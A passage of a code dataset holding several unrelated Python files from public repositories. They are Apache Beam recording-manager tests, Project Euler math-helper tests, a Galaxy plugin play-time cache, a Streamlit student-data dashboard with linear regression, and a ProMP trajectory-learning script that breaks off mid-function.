self.assertEqual(list(stream.read(tail=False))[0], 'expected')\n\n # The underlying pipeline is terminated, so the stream won't yield new\n # elements.\n self.assertTrue(stream.is_done())\n\n def test_read_n(self):\n \"\"\"Test that the stream only reads 'n' elements.\"\"\"\n\n self.mock_result.set_state(PipelineState.DONE)\n self.cache.write(list(range(5)), 'full', self.cache_key)\n self.cache.save_pcoder(None, 'full', self.cache_key)\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=1, max_duration_secs=1)\n self.assertEqual(list(stream.read()), [0])\n self.assertTrue(stream.is_done())\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=2, max_duration_secs=1)\n self.assertEqual(list(stream.read()), [0, 1])\n self.assertTrue(stream.is_done())\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=5, max_duration_secs=1)\n self.assertEqual(list(stream.read()), list(range(5)))\n self.assertTrue(stream.is_done())\n\n # Test that if the user asks for more than in the cache it still returns.\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=10, max_duration_secs=1)\n self.assertEqual(list(stream.read()), list(range(5)))\n self.assertTrue(stream.is_done())\n\n def test_read_duration(self):\n \"\"\"Test that the stream only reads a 'duration' of elements.\"\"\"\n def as_windowed_value(element):\n return WindowedValueHolder(WindowedValue(element, 0, []))\n\n values = (FileRecordsBuilder(tag=self.cache_key)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(0), event_time_secs=0)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(1), event_time_secs=1)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(2), event_time_secs=3)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(3), event_time_secs=4)\n .advance_processing_time(1)\n .add_element(element=as_windowed_value(4), event_time_secs=5)\n .build()) # yapf: disable\n\n values = [\n v.recorded_event for v in values\n if isinstance(v, beam_interactive_api_pb2.TestStreamFileRecord)\n ]\n\n self.mock_result.set_state(PipelineState.DONE)\n self.cache.write(values, 'full', self.cache_key)\n self.cache.save_pcoder(coders.FastPrimitivesCoder(), 'full', self.cache_key)\n\n # The following tests a progression of reading different durations from the\n # cache.\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=1)\n self.assertSequenceEqual([e.value for e in stream.read()], [0])\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=2)\n self.assertSequenceEqual([e.value for e in stream.read()], [0, 1])\n\n stream = ElementStream(\n self.pcoll, '', self.cache_key, max_n=100, max_duration_secs=10)\n self.assertSequenceEqual([e.value for e in stream.read()], [0, 1, 2, 3, 4])\n\n\nclass RecordingTest(unittest.TestCase):\n def test_computed(self):\n \"\"\"Tests that a PCollection is marked as computed only in a complete state.\n\n Because the background caching job is now long-lived, repeated runs of a\n PipelineFragment may yield different results for the same PCollection.\n \"\"\"\n\n p = beam.Pipeline(InteractiveRunner())\n elems = p | beam.Create([0, 1, 2])\n\n ib.watch(locals())\n\n # Create a MockPipelineResult to control the state of a fake run of the\n # pipeline.\n mock_result = MockPipelineResult()\n ie.current_env().track_user_pipelines()\n ie.current_env().set_pipeline_result(p, mock_result)\n\n # Create a mock BackgroundCachingJob 
that will control whether to set the\n # PCollections as computed or not.\n bcj_mock_result = MockPipelineResult()\n background_caching_job = bcj.BackgroundCachingJob(bcj_mock_result, [])\n\n # Create a recording.\n recording = Recording(\n p, [elems], mock_result, max_n=10, max_duration_secs=60)\n\n # The background caching job and the recording isn't done yet so there may\n # be more elements to be recorded.\n self.assertFalse(recording.is_computed())\n self.assertFalse(recording.computed())\n self.assertTrue(recording.uncomputed())\n\n # The recording is finished but the background caching job is not. There\n # may still be more elements to record, or the intermediate PCollection may\n # have stopped caching in an incomplete state, e.g. before a window could\n # fire.\n mock_result.set_state(PipelineState.DONE)\n recording.wait_until_finish()\n\n self.assertFalse(recording.is_computed())\n self.assertFalse(recording.computed())\n self.assertTrue(recording.uncomputed())\n\n # The background caching job finished before we started a recording which\n # is a sure signal that there will be no more elements.\n bcj_mock_result.set_state(PipelineState.DONE)\n ie.current_env().set_background_caching_job(p, background_caching_job)\n recording = Recording(\n p, [elems], mock_result, max_n=10, max_duration_secs=60)\n recording.wait_until_finish()\n\n # There are no more elements and the recording finished, meaning that the\n # intermediate PCollections are in a complete state. They can now be marked\n # as computed.\n self.assertTrue(recording.is_computed())\n self.assertTrue(recording.computed())\n self.assertFalse(recording.uncomputed())\n\n def test_describe(self):\n p = beam.Pipeline(InteractiveRunner())\n numbers = p | 'numbers' >> beam.Create([0, 1, 2])\n letters = p | 'letters' >> beam.Create(['a', 'b', 'c'])\n\n ib.watch(locals())\n\n # Create a MockPipelineResult to control the state of a fake run of the\n # pipeline.\n mock_result = MockPipelineResult()\n ie.current_env().track_user_pipelines()\n ie.current_env().set_pipeline_result(p, mock_result)\n\n cache_manager = InMemoryCache()\n ie.current_env().set_cache_manager(cache_manager, p)\n\n # Create a recording with an arbitrary start time.\n recording = Recording(\n p, [numbers, letters], mock_result, max_n=10, max_duration_secs=60)\n\n # Get the cache key of the stream and write something to cache. This is\n # so that a pipeline doesn't have to run in the test.\n numbers_stream = recording.stream(numbers)\n cache_manager.write([0, 1, 2], 'full', numbers_stream.cache_key)\n cache_manager.save_pcoder(None, 'full', numbers_stream.cache_key)\n\n letters_stream = recording.stream(letters)\n cache_manager.write(['a', 'b', 'c'], 'full', letters_stream.cache_key)\n cache_manager.save_pcoder(None, 'full', letters_stream.cache_key)\n\n # Get the description.\n description = recording.describe()\n size = description['size']\n\n self.assertEqual(\n size,\n cache_manager.size('full', numbers_stream.cache_key) +\n cache_manager.size('full', letters_stream.cache_key))\n\n\nclass RecordingManagerTest(unittest.TestCase):\n def test_basic_execution(self):\n \"\"\"A basic pipeline to be used as a smoke test.\"\"\"\n\n # Create the pipeline that will emit 0, 1, 2.\n p = beam.Pipeline(InteractiveRunner())\n numbers = p | 'numbers' >> beam.Create([0, 1, 2])\n letters = p | 'letters' >> beam.Create(['a', 'b', 'c'])\n\n # Watch the pipeline and PCollections. 
This is normally done in a notebook\n # environment automatically, but we have to do it manually here.\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n # Create the recording objects. By calling `record` a new PipelineFragment\n # is started to compute the given PCollections and cache to disk.\n rm = RecordingManager(p)\n numbers_recording = rm.record([numbers], max_n=3, max_duration=500)\n numbers_stream = numbers_recording.stream(numbers)\n numbers_recording.wait_until_finish()\n\n # Once the pipeline fragment completes, we can read from the stream and know\n # that all elements were written to cache.\n elems = list(numbers_stream.read())\n expected_elems = [\n WindowedValue(i, MIN_TIMESTAMP, [GlobalWindow()]) for i in range(3)\n ]\n self.assertListEqual(elems, expected_elems)\n\n # Make an extra recording and test the description.\n letters_recording = rm.record([letters], max_n=3, max_duration=500)\n letters_recording.wait_until_finish()\n\n self.assertEqual(\n rm.describe()['size'],\n numbers_recording.describe()['size'] +\n letters_recording.describe()['size'])\n\n rm.cancel()\n\n def test_duration_parsing(self):\n p = beam.Pipeline(InteractiveRunner())\n elems = p | beam.Create([0, 1, 2])\n\n # Watch the pipeline and PCollections. This is normally done in a notebook\n # environment automatically, but we have to do it manually here.\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n # Create the recording objects.\n rm = RecordingManager(p)\n recording = rm.record([elems], max_n=3, max_duration='500s')\n recording.wait_until_finish()\n\n # Assert that the duration was parsed correctly to integer seconds.\n self.assertEqual(recording.describe()['duration'], 500)\n\n def test_cancel_stops_recording(self):\n # Add the TestStream so that it can be cached.\n ib.options.recordable_sources.add(TestStream)\n\n p = beam.Pipeline(\n InteractiveRunner(), options=PipelineOptions(streaming=True))\n elems = (\n p\n | TestStream().advance_watermark_to(0).advance_processing_time(\n 1).add_elements(list(range(10))).advance_processing_time(1))\n squares = elems | beam.Map(lambda x: x**2)\n\n # Watch the local scope for Interactive Beam so that referenced PCollections\n # will be cached.\n ib.watch(locals())\n\n # This is normally done in the interactive_utils when a transform is\n # applied but needs an IPython environment. So we manually run this here.\n ie.current_env().track_user_pipelines()\n\n class SemaphoreLimiter(Limiter):\n def __init__(self):\n self.triggered = False\n\n def is_triggered(self):\n return self.triggered\n\n # Get the recording then the BackgroundCachingJob.\n semaphore_limiter = SemaphoreLimiter()\n rm = RecordingManager(p, test_limiters=[semaphore_limiter])\n rm.record([squares], max_n=10, max_duration=500)\n\n # The BackgroundCachingJob is still waiting for more elements, so it isn't\n # done yet.\n bcj = ie.current_env().get_background_caching_job(p)\n self.assertFalse(bcj.is_done())\n\n # Assert that something was read and that the BackgroundCachingJob was\n # sucessfully stopped.\n # self.assertTrue(list(recording.stream(squares).read()))\n semaphore_limiter.triggered = True\n rm.cancel()\n self.assertTrue(bcj.is_done())\n\n def test_recording_manager_clears_cache(self):\n \"\"\"Tests that the RecordingManager clears the cache before recording.\n\n A job may have incomplete PCollections when the job terminates. 
Clearing the\n cache ensures that correct results are computed every run.\n \"\"\"\n # Add the TestStream so that it can be cached.\n ib.options.recordable_sources.add(TestStream)\n p = beam.Pipeline(\n InteractiveRunner(), options=PipelineOptions(streaming=True))\n elems = (\n p\n | TestStream().advance_watermark_to(0).advance_processing_time(\n 1).add_elements(list(range(10))).advance_processing_time(1))\n squares = elems | beam.Map(lambda x: x**2)\n\n # Watch the local scope for Interactive Beam so that referenced PCollections\n # will be cached.\n ib.watch(locals())\n\n # This is normally done in the interactive_utils when a transform is\n # applied but needs an IPython environment. So we manually run this here.\n ie.current_env().track_user_pipelines()\n\n # Do the first recording to get the timestamp of the first time the fragment\n # was run.\n rm = RecordingManager(p)\n\n # Set up a mock for the Cache's clear function which will be used to clear\n # uncomputed PCollections.\n rm._clear_pcolls = MagicMock()\n rm.record([squares], max_n=1, max_duration=500)\n rm.cancel()\n\n # Assert that the cache cleared the PCollection.\n rm._clear_pcolls.assert_any_call(\n unittest.mock.ANY,\n # elems is unbounded source populated by the background job, thus not\n # cleared.\n {CacheKey.from_pcoll('squares', squares).to_str()})\n\n def test_clear(self):\n p1 = beam.Pipeline(InteractiveRunner())\n elems_1 = p1 | 'elems 1' >> beam.Create([0, 1, 2])\n\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n recording_manager = RecordingManager(p1)\n recording = recording_manager.record([elems_1], max_n=3, max_duration=500)\n recording.wait_until_finish()\n record_describe = recording_manager.describe()\n self.assertGreater(record_describe['size'], 0)\n recording_manager.clear()\n self.assertEqual(recording_manager.describe()['size'], 0)\n\n def test_clear_specific_pipeline(self):\n \"\"\"Tests that clear can empty the cache for a specific pipeline.\"\"\"\n\n # Create two pipelines so we can check that clearing the cache won't clear\n # all defined pipelines.\n p1 = beam.Pipeline(InteractiveRunner())\n elems_1 = p1 | 'elems 1' >> beam.Create([0, 1, 2])\n\n p2 = beam.Pipeline(InteractiveRunner())\n elems_2 = p2 | 'elems 2' >> beam.Create([0, 1, 2])\n\n # Watch the pipeline and PCollections. This is normally done in a notebook\n # environment automatically, but we have to do it manually here.\n ib.watch(locals())\n ie.current_env().track_user_pipelines()\n\n # Create the recording objects. 
By calling `record` a new PipelineFragment\n # is started to compute the given PCollections and cache to disk.\n rm_1 = RecordingManager(p1)\n recording = rm_1.record([elems_1], max_n=3, max_duration=500)\n recording.wait_until_finish()\n\n rm_2 = RecordingManager(p2)\n recording = rm_2.record([elems_2], max_n=3, max_duration=500)\n recording.wait_until_finish()\n # Assert that clearing only one recording clears that recording.\n if rm_1.describe()['state'] == PipelineState.STOPPED \\\n and rm_2.describe()['state'] == PipelineState.STOPPED:\n\n self.assertGreater(rm_1.describe()['size'], 0)\n self.assertGreater(rm_2.describe()['size'], 0)\n rm_1.clear()\n self.assertEqual(rm_1.describe()['size'], 0)\n self.assertGreater(rm_2.describe()['size'], 0)\n\n rm_2.clear()\n self.assertEqual(rm_2.describe()['size'], 0)\n\n def test_record_pipeline(self):\n # Add the TestStream so that it can be cached.\n ib.options.recordable_sources.add(TestStream)\n p = beam.Pipeline(\n InteractiveRunner(), options=PipelineOptions(streaming=True))\n # pylint: disable=unused-variable\n _ = (p\n | TestStream()\n .advance_watermark_to(0)\n .advance_processing_time(1)\n .add_elements(list(range(10)))\n .advance_processing_time(1)) # yapf: disable\n\n # Watch the local scope for Interactive Beam so that referenced PCollections\n # will be cached.\n ib.watch(locals())\n\n # This is normally done in the interactive_utils when a transform is\n # applied but needs an IPython environment. So we manually run this here.\n ie.current_env().track_user_pipelines()\n\n # Create a lmiter that stops the background caching job when something is\n # written to cache. This is used to make ensure that the pipeline is\n # functioning properly and that there are no data races with the test.\n class SizeLimiter(Limiter):\n def __init__(self, p):\n self.pipeline = p\n self._rm = None\n\n def set_recording_manager(self, rm):\n self._rm = rm\n\n def is_triggered(self):\n return self._rm.describe()['size'] > 0 if self._rm else False\n\n # Do the first recording to get the timestamp of the first time the fragment\n # was run.\n size_limiter = SizeLimiter(p)\n rm = RecordingManager(p, test_limiters=[size_limiter])\n size_limiter.set_recording_manager(rm)\n self.assertEqual(rm.describe()['state'], PipelineState.STOPPED)\n self.assertTrue(rm.record_pipeline())\n\n # A recording is in progress, no need to start another one.\n self.assertFalse(rm.record_pipeline())\n\n for _ in range(60):\n if rm.describe()['state'] == PipelineState.CANCELLED:\n break\n time.sleep(1)\n self.assertTrue(\n rm.describe()['state'] == PipelineState.CANCELLED,\n 'Test timed out waiting for pipeline to be cancelled. This indicates '\n 'that the BackgroundCachingJob did not cache anything.')\n\n @patch(\n 'apache_beam.runners.interactive.recording_manager.'\n 'RecordingManager._clear_pcolls',\n return_value=None)\n @patch(\n 'apache_beam.runners.interactive.pipeline_fragment.'\n 'PipelineFragment.run',\n return_value=None)\n def test_record_detects_remote_runner(\n self, mock_pipeline_fragment, mock_clear_pcolls):\n \"\"\"Tests that a remote runner is detected, resulting in the\n PipelineFragment instance to have blocking enabled.\"\"\"\n\n # Create the pipeline that will emit 0, 1, 2.\n p = beam.Pipeline(InteractiveRunner())\n numbers = p | 'numbers' >> beam.Create([0, 1, 2])\n\n # Set the cache directory for Interactive Beam to be in a GCS bucket.\n ib.options.cache_root = 'gs://test-bucket/'\n\n # Create the recording objects. 
By calling `record` a new PipelineFragment\n # is started to compute the given PCollections and cache to disk.\n rm = RecordingManager(p)\n\n # Run record() and check if the PipelineFragment.run had blocking set to\n # True due to the GCS cache_root value.\n rm.record([numbers], max_n=3, max_duration=500)\n mock_pipeline_fragment.assert_called_with(blocking=True)\n\n # Reset cache_root value.\n ib.options.cache_root = None\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"apache/beam","sub_path":"sdks/python/apache_beam/runners/interactive/recording_manager_test.py","file_name":"recording_manager_test.py","file_ext":"py","file_size_in_byte":21385,"program_lang":"python","lang":"en","doc_type":"code","stars":7242,"dataset":"github-code","pt":"70"}
+{"seq_id":"35131218964","text":"#!/usr/bin/python3\n\"\"\"\ntests for Utilities.math_helpers\n\"\"\"\n\nimport os, sys\nsys.path.append(os.getcwd())\n\nimport unittest\nfrom Utilities import math_helpers\n\nclass HexagonalNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.hexagonal_number_generator\n \"\"\"\n\n def test_generation(self):\n \"\"\"\n test that the hexagonal number generator generates hexagonal numbers, as expected.\n \"\"\"\n generator = math_helpers.hexagonal_number_generator()\n first_ten_hex_numbers = [next(generator) for _ in range(10)]\n canonical_values = [1, 6, 15, 28, 45, 66, 91, 120, 153, 190]\n self.assertEqual(canonical_values, first_ten_hex_numbers)\n\nclass PentagonalNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.pentagonal_number_generator\n \"\"\"\n\n def test_generation(self):\n \"\"\"\n test that the pentagonal number generator generates pentagonal numbers, as expected.\n \"\"\"\n generator = math_helpers.pentagonal_number_generator()\n first_ten_pentagonal_numbers = [next(generator) for _ in range(10)]\n canonical_values = [1, 5, 12, 22, 35, 51, 70, 92, 117, 145]\n self.assertEqual(canonical_values, first_ten_pentagonal_numbers)\n\nclass IsPentagonal(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.is_pentagonal\n \"\"\"\n\n def test_first_thousand_pentagonal_numbers(self):\n \"\"\"\n test that the first thousand pentagonal numbers are identified as such.\n \"\"\"\n generator = math_helpers.pentagonal_number_generator()\n first_thousand_pentagonal_numbers = [next(generator) for _ in range(1000)]\n all_pentagonal = all(map(lambda x: math_helpers.is_pentagonal(x), first_thousand_pentagonal_numbers))\n self.assertEqual(all_pentagonal, True)\n\n def test_very_large_pentagonal_numbers(self):\n \"\"\"\n test that even large pentagonal numbers are correctly identified as such\n (i.e. 
check whether we might expect to run into floating-point error)\n \"\"\"\n large_n = [x**9 for x in range(10000,10500)]\n pentagonals = [(n * (3 * n - 1)) // 2 for n in large_n]\n all_pentagonal = all(map(lambda x: math_helpers.is_pentagonal(x), pentagonals))\n self.assertEqual(all_pentagonal, True)\n\n def test_not_pentagonal(self):\n \"\"\"\n test some non-pentagonal numbers, make sure they don't show up as pentagonal.\n \"\"\"\n generator = math_helpers.pentagonal_number_generator()\n pents = set(next(generator) for _ in range(1000))\n non_pentagonals = set(x for x in range(max(pents)) if x not in pents)\n any_pentagonals = any(map(lambda x: math_helpers.is_pentagonal(x), non_pentagonals))\n self.assertEqual(any_pentagonals, False)\n\nclass TriangleNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.triangle_number_generator\n \"\"\"\n\n def test_generation_index_zero(self):\n \"\"\"\n test that the generator yields the correct output when indexing from zero\n \"\"\"\n generator = math_helpers.triangle_number_generator()\n first_eleven_triangle_numbers = [next(generator) for _ in range(11)]\n canonical_values = [0, 1, 3, 6, 10, 15, 21, 28, 36, 45, 55]\n self.assertEqual(canonical_values, first_eleven_triangle_numbers)\n\n def test_generation_index_one(self):\n \"\"\"\n test that the generator yields the correct output when indexing from one\n \"\"\"\n generator = math_helpers.triangle_number_generator(1)\n first_ten_triangle_numbers = [next(generator) for _ in range(10)]\n canonical_values = [1, 3, 6, 10, 15, 21, 28, 36, 45, 55]\n self.assertEqual(canonical_values, first_ten_triangle_numbers)\n\nclass FirstNTriangleNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.first_n_triangle_numbers\n \"\"\"\n\n def test_first_n_triangle_numbers(self):\n self.assertEqual(list(math_helpers.first_n_triangle_numbers(0)), [])\n self.assertEqual(list(math_helpers.first_n_triangle_numbers(1)), [1])\n self.assertEqual(list(math_helpers.first_n_triangle_numbers(5)), [1, 3, 6, 10, 15])\n\nclass Divisors(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.divisors(n)\n \"\"\"\n\n def test_error_case(self):\n \"\"\"\n divisors(n) should throw errors if given input that is n < 1 or not a whole number.\n \"\"\"\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(0))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(-2))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(3.5))\n\n def test_small_cases(self):\n \"\"\"\n test that it returns the correct output for small values\n \"\"\"\n case_one = list(math_helpers.divisors(1))\n self.assertEqual(case_one, [1])\n\n case_two = math_helpers.divisors(2)\n self.assertCountEqual(case_two, [1, 2])\n\n case_three = math_helpers.divisors(10)\n self.assertCountEqual(case_three, [1, 2, 5, 10])\n\n case_four = math_helpers.divisors(21)\n self.assertCountEqual(case_four, [1, 21, 3, 7])\n\n case_five = math_helpers.divisors(37)\n self.assertCountEqual(case_five, [1, 37])\n\n case_six = math_helpers.divisors(128)\n self.assertCountEqual(case_six, [1, 2, 4, 8, 16, 32, 64, 128])\n\n case_seven = math_helpers.divisors(11029)\n self.assertCountEqual(case_seven, [1, 41, 269, 11029])\n\n case_eight = math_helpers.divisors(6930)\n self.assertCountEqual(case_eight, [1, 2, 3, 5, 6, 7, 9, 10, 11, 14, 15, 18, 21, 22,\n 30, 33, 35, 42, 45, 55, 63, 66, 70, 77, 90, 99,\n 105, 110, 126, 154, 165, 198, 210, 231, 315, 330,\n 385, 462, 495, 630, 693, 770, 990, 1155, 1386,\n 2310, 3465, 
6930])\n\nclass NumDivisors(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.divisors(n)\n \"\"\"\n\n def test_cases(self):\n \"\"\"\n test that we get the correct output\n \"\"\"\n case_one = math_helpers.num_divisors(1)\n self.assertEqual(case_one, 1)\n\n case_two = math_helpers.num_divisors(10)\n self.assertEqual(case_two, 4)\n\n case_three = math_helpers.num_divisors(6930)\n self.assertEqual(case_three, 48)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Datamine/Project-Euler","sub_path":"Tests/math_helpers_test.py","file_name":"math_helpers_test.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"6726209604","text":"import logging\nfrom TimeUtils import time_delta_calc_minutes\nfrom LocalCache import update_cache_time\nfrom galaxy.api.types import GameTime\n\nimport math\n\nfrom escapejson import escapejson\n\nasync def finished_game_run(self, start_time, game_id, local_time_cache):\n logging.debug(\"game finished\")\n logging.debug(game_id)\n my_delta = await time_delta_calc_minutes(start_time)\n logging.debug(my_delta)\n my_cache_update =[]\n placed_game = False\n for current_game in local_time_cache:\n if current_game[\"hash_digest\"] == game_id:\n logging.debug(\"game play time updated\")\n logging.debug(game_id)\n #update it if it exists in some form\n my_game_update = await created_update(current_game, my_delta, start_time)\n placed_game = True\n my_cache_update.append(my_game_update)\n else:\n #This entry doesn't need an update\n my_cache_update.append(current_game)\n if not placed_game:\n #new entry to be placed\n logging.debug(\"game played for the first time\")\n my_game_update = {} \n my_game_update[\"run_time_total\"] = my_delta\n my_game_update[\"last_time_played\"] = math.floor(start_time.timestamp() )\n my_game_update[\"hash_digest\"] = game_id\n my_cache_update.append(my_game_update)\n await update_cache_time(self, my_cache_update, self.backend.cache_times_filepath)\n my_game_id = escapejson(game_id)\n self.backend.my_queue_update_game_time.put(GameTime(my_game_id, my_game_update[\"run_time_total\"], my_game_update[\"last_time_played\"]))\n\nasync def created_update(current_game, my_delta, start_time):\n my_game_update = current_game.copy()\n if \"run_time_total\" in current_game.keys():\n logging.debug(\"updated play time\")\n my_game_update[\"run_time_total\"] = current_game[\"run_time_total\"] + my_delta\n else:\n logging.debug(\"new play time\")\n my_game_update[\"run_time_total\"] = my_delta\n my_game_update[\"last_time_played\"] = math.floor(start_time.timestamp() )\n return my_game_update\n","repo_name":"AndrewDWhite/GalaxyGenericImporterPlugin","sub_path":"src/TimeCache.py","file_name":"TimeCache.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"70"}
+{"seq_id":"6707858586","text":"import streamlit as st\nimport pandas as pd\nimport pandasql as ps\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\n\n\nst.title('Headstarter Student Analysis')\ndf = pd.read_csv('HackathonDataset.csv')\n\nst.header('Full Data')\nst.write(df)\n\nst.header('Majors Bar Chart')\nmajor_counts = df['Major'].value_counts()\nprint(major_counts.head(10))\nst.bar_chart(major_counts)\n\nfilter_query = \"SELECT * FROM df WHERE Complain = 0 AND Headstarter_Rating >= 7\"\nfiltered_data = ps.sqldf(filter_query, locals())\nst.header('Filtered Data (Complaints and Low Ratings Removed)')\nst.write(filtered_data)\n\nincome = st.slider('How much Income?', 10000, 100000)\n# dual query of people who are not computer science majors and make less than 100k income\n# pyplot - see plots available\n# logistic regression\nst.header('Incomes Below Six Figures and Other Variables')\nmajor_income_query = f\"SELECT * FROM filtered_data WHERE Income < {income}\"\nincome_counts = ps.sqldf(major_income_query, locals())\nst.write(income_counts)\n\nfigOne = px.scatter(income_counts, x='Minutes_Spent_on_Headstarter', y=\"Income\")\nst.plotly_chart(figOne)\n\nfigTwo = px.scatter(income_counts, x='Days_Since_Last_Cohort', y=\"Income\")\nst.plotly_chart(figTwo)\n\nemails = st.slider('How many emails opened?', 0,20)\nst.header(\"Email Opens and Other Variables\")\nemails_query = f\"SELECT * FROM filtered_data WHERE Email_Opens <= {emails}\"\nemail_opens = ps.sqldf(emails_query, locals())\nst.write(email_opens)\n\nfigThree = px.scatter(email_opens, x='Email_Opens', y=\"Minutes_Spent_on_Headstarter\")\nst.plotly_chart(figThree)\n\n\nfigFive = px.scatter(email_opens, x='Email_Opens', y=\"Amount_Spent_On_Courses\")\nst.plotly_chart(figFive)\n\nfigSix = px.scatter(email_opens, x='Email_Opens', y=\"Videos_Watched\")\nst.plotly_chart(figSix)\n\nfigSeven = px.scatter(email_opens, x='Email_Opens', y=\"Site_Visits_Per_Month\")\nst.plotly_chart(figSeven)\n\n\nst.header('Education Filter')\neducation = st.radio(\"What's education level do you want to filter through?\",(\"'In-College'\", \"'High School'\", \"'Bachelors'\", \"'Masters'\", \"'PhD'\"))\nyoung_compsci_query = f\"SELECT * FROM filtered_data WHERE Education = {education}\"\nyoung_compsci = ps.sqldf(young_compsci_query, locals())\nst.write(young_compsci)\n\nst.header('MultiQuery')\nmulti_query = f\"SELECT * FROM filtered_data WHERE Education = {education} AND Income < {income}\"\nmulti_query_data = ps.sqldf(multi_query, locals())\nst.write(multi_query_data)\n\n\n#Linear Regression\ny = filtered_data['Probability_Of_Getting_Offer']\noffer_cols = ['Highest_Leaderboard_Rank', 'Minutes_Spent_Coding', 'Questions_Completed','Minutes_Spent_on_Headstarter']\nX = filtered_data[offer_cols]\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25,random_state=0) \nlinreg = linear_model.LinearRegression() \nlinreg.fit(X_train,y_train) \ny_pred=linreg.predict(X_test)\nr_squared = linreg.score(X, y)\n\nprint(r_squared)\nerror = mean_squared_error(y_test, y_pred)\nprint(error)\n\nst.header('Machine Learning Model Results (Linear Regression)')\nst.subheader(f'R Squared: {r_squared}')\nst.caption('How accurate each data point is. 
The closer to 1, the more accurate.')\nst.subheader(f'Mean Error Squared: {error}')\nst.caption('Error between each data point and the expected.')\n\n#Google Neural Networks and Decision Trees","repo_name":"Sajid2001/Headstarter-Hackathon-Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28993803803","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom getImitationData import *\nfrom getProMPBasis import *\nfrom scipy.linalg import block_diag\ndef proMP (nBasis):\n\n dt = 0.002\n time = np.arange(dt,3,dt)\n nSteps = len(time);\n data = getImitationData(dt, time, multiple_demos=True)\n q = data[0]\n qd = data[1]\n qdd = data[2]\n\n bandwidth = 0.2\n # shape (Phi) = (30, 1499)\n Phi = getProMPBasis( dt, nSteps, nBasis, bandwidth )\n\n # y = [q, qd]\n w = np.matmul(np.linalg.pinv(Phi.transpose()),q.transpose())\n mean_w = np.mean(w,axis=1)\n cov_w = np.cov(w)\n # print np.std(w, axis=1)\n # print np.cov(w)\n\n # shape(w) = (30, 45)\n # Phi = np.transpose(Phi[0:nSteps])\n # plt.figure()\n # plt.hold('on')\n # plt.fill_between(time, np.dot(Phi.transpose(),mean_w) - 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), np.dot(Phi.transpose(),mean_w) + 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), alpha=0.5, edgecolor='#1B2ACC', facecolor='#089FFF')\n # plt.plot(time,np.dot(Phi.transpose(),mean_w), color='#1B2ACC')\n # plt.plot(time,q.transpose())\n # plt.title('ProMP learned from several trajectories(N=20)')\n # plt.title('Trajectories used for imitation.')\n # plt.pause(10)\n\n #Conditioning\n y_d = 3\n Sig_d = 0.0002\n t_point = np.round(2300/2)\n\n Phi_t_T = np.array(Phi[:, t_point])[np.newaxis]\n Phi_t = np.transpose(Phi_t_T)\n covw_phit = np.dot(cov_w, Phi_t)\n x1 = 1 / ( Sig_d + np.dot(Phi_t_T, covw_phit))\n mean_w_new = np.dot(covw_phit, np.dot(x1, y_d-np.dot(Phi_t_T, mean_w)))\n mean_w_new = np.asarray(mean_w + mean_w_new)\n cov_w_new = np.dot(covw_phit, np.dot(x1, np.dot(Phi_t_T, cov_w)))\n cov_w_new = np.asarray(cov_w - cov_w_new)\n\n plt.figure()\n plt.hold('on')\n # plt.fill_between(time, np.dot(Phi.transpose(),mean_w) - 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), np.dot(Phi.transpose(),mean_w) + 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), alpha=0.5, edgecolor='#1B2ACC', facecolor='#089FFF')\n # plt.plot(time,np.dot(Phi.transpose(),mean_w), color='#1B2ACC')\n # plt.fill_between(time, np.dot(Phi.transpose(),mean_w_new) - 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w_new,Phi)))), np.dot(Phi.transpose(),mean_w_new) + 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w_new,Phi)))), alpha=0.5, edgecolor='#CC4F1B', facecolor='#FF9848')\n # plt.plot(time,np.dot(Phi.transpose(),mean_w_new), color='#CC4F1B')\n sample_traj = np.dot(Phi.transpose(),np.random.multivariate_normal(mean_w_new,cov_w_new,10).transpose())\n plt.plot(time,sample_traj)\n # plt.title('ProMP after contidioning with new sampled trajectories')\n plt.title('New computed trajectories from sampled K=10 random weights vectors')\n 